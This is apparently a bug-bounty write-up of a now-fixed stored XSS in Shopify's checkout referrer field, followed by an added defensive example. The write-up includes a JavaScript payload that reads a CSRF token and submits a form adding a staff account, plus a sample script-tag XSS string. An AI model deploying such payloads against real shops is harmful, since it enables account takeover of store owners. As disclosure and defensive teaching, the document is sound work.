How we took over Shopify accounts with one single click




To keep up with the security companies, we often spend some time on bug bounties. That was a very boring weekend until we found out that Shopify had published their bug bounty program on HackerOne. By the time I turned back and forth, all my teammates were plugged in. We found many cool vulnerabilities like privilege escalation, a few XSSs and an OAuth redirect bypass.

In this blog post I am going to show you how I used a persistent (stored) cross-site scripting vulnerability to take over shops. This vulnerability was easy to exploit, and any customer or user could take over the shop.

When a customer purchases any product from a shop on Shopify, they are redirected to a checkout page. The redirect request carries two other parameters, one of which is an interesting parameter called referrer. This referrer parameter tracks where customers come from: for example, if there is a “buy now” button embedded on another site and a customer clicks it to buy a product, the referrer value is reflected in the admin panel of the shop, as shown in the screenshot below. The value is shown to the shop owner without being escaped, which is what makes it a stored XSS: whatever the customer puts in referrer is rendered as HTML in the admin's browser.

So to take over the shop, a customer simply has to purchase a product from this address with the referrer parameter set to the payload.



To make it more fun, we wrote some code that adds an admin user on every click in the admin panel. This way one could take over a shop!

PS: After we reported this vulnerability, Shopify started using CSP (Content Security Policy) as an extra measure to protect their customers from this kind of vulnerability. With CSP it isn't possible to execute inline script.


var xhr = new XMLHttpRequest();
// Fetch the admin page synchronously so the CSRF token can be read from it.
// The URL was stripped from the original post and is left empty here.
xhr.open("GET", "", false);
xhr.send();
var token = xhr.responseText;
// Locate the CSRF meta tag; the post does not show how the token value itself was cut out of the page.
var pos = token.indexOf("csrf-param");
// Build and submit the "create staff account" form with the stolen token.
// The form action URL was also stripped from the original post and is left empty.
document.write("<html><body><form action='' method='POST'>" +
  "<input type='hidden' name='utf8' value='✓'>" +
  "<input type='hidden' name='authenticity_token' value='" + token + "'/>" +
  "<input type='hidden' name='user[first_name]' value='hacked' />" +
  "<input type='hidden' name='user[last_name]' value='hacked'>" +
  "<input type='hidden' name='user[email]' value='example+hacked@hotmail.com' />" +
  "<input type='hidden' name='_method' value='post'>" +
  "<input type='submit' value='Submit form'></form></body></html>");
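As an added example (not Shopify's code; the admin view markup and the CSP directives are assumptions), here are the two defences that close this class of bug: escaping the referrer value on output in the admin panel, and the kind of CSP mentioned in the PS, which refuses inline script. It goes slightly beyond the post by including a small check for whether a given CSP value still permits inline script.

```javascript
// Added example, not code from the original post. Field names, the admin
// table markup and the CSP directives are assumptions made for illustration.

// Characters that can break out of an HTML text or attribute context.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// 1) Output encoding: escape an untrusted value before interpolating it into HTML.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// How the admin view rendered the tracked referrer: raw interpolation, so a
// referrer containing markup is parsed and executed in the shop owner's browser.
function renderReferrerVulnerable(referrer) {
  return `<td class="referrer">${referrer}</td>`;
}

// The fixed rendering: the same value, escaped, is displayed as text only.
function renderReferrerSafe(referrer) {
  return `<td class="referrer">${escapeHtml(referrer)}</td>`;
}

// 2) Defence in depth: a Content-Security-Policy for the admin panel that refuses
// inline script. Only the application's own <script> tags carrying the per-response
// nonce may run; an injected inline script has no nonce and is blocked.
function adminCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// Review helper: does a CSP header value still let inline script run?
// 'unsafe-inline' permits it unless a nonce or hash source is also present,
// in which case browsers supporting CSP Level 2 ignore 'unsafe-inline'.
function cspAllowsInlineScript(csp) {
  const directives = new Map(
    csp.split(';').map((d) => d.trim().split(/\s+/)).map(([name, ...src]) => [name, src]),
  );
  const sources = directives.get('script-src') || directives.get('default-src') || [];
  const hasNonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Constructed sample: a referrer value carrying markup, as a customer could supply it.
const SAMPLE_REFERRER = '<script>alert(document.domain)</script>';
```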


We reported this vulnerability to Shopify via HackerOne. It has since been fixed and can no longer be reproduced.

Shopify rewarded us with a decent bounty, which made our next weekend really amazing.
